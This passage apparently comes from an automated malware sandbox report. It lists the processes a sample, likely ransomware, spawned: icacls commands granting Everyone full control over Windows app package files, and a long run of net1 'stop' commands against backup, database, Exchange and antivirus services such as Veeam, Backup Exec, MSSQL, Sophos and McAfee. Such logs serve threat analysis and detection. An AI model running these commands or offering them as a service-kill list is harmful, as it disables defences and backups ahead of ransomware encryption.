    3⤵
    PID:8644
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5564
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:2044
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:13000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13684
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:6556
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13028
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12924
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12660
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12948
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:10376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8924
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:13156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:15156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13564
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:13476
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8912
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8900
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12824
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12740
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:13724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:17848
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:7564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start upnphost /y
1⤵
PID:4692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:11920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:8168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:8176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:7208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:7072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:8208

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4952

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4552

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:10196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:15032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:14988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:14964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:14956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:14948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:14940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:14932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:14924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:15180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:15176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:17288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:17240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:17232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:17208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:17196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:17192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:15152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:15144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:15136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:15088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:15080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:15072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:15064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:15056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:15048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:14916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:14908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:14884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:14876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:14868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:14860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:14852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:14844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:14836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:14828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:14820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:14804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:14796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:14788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:14780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:14772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:14764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:14740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:14756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:14748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:14732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:14724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:14716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:14708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:14692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:14644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:14636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:14628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:14612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:14604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:14564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:14556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:14548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:14540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:14532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:14524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:14516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:14508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:14500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:14492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:14484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:14476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:14468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:14460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:14452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:14444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:14436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:14428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:14420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:14412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:14404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:14396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:14388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:14380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:14372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:14364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:14356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:14348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:5104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:4684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:4828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:2828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:4168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:4188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:4156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:3556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:4068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:14000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:12416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:5276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:4224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:4048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:5108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:11280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:12244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:11060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:11048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:5228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:9756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:12164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:8032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:11384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:2216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:11360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:9732

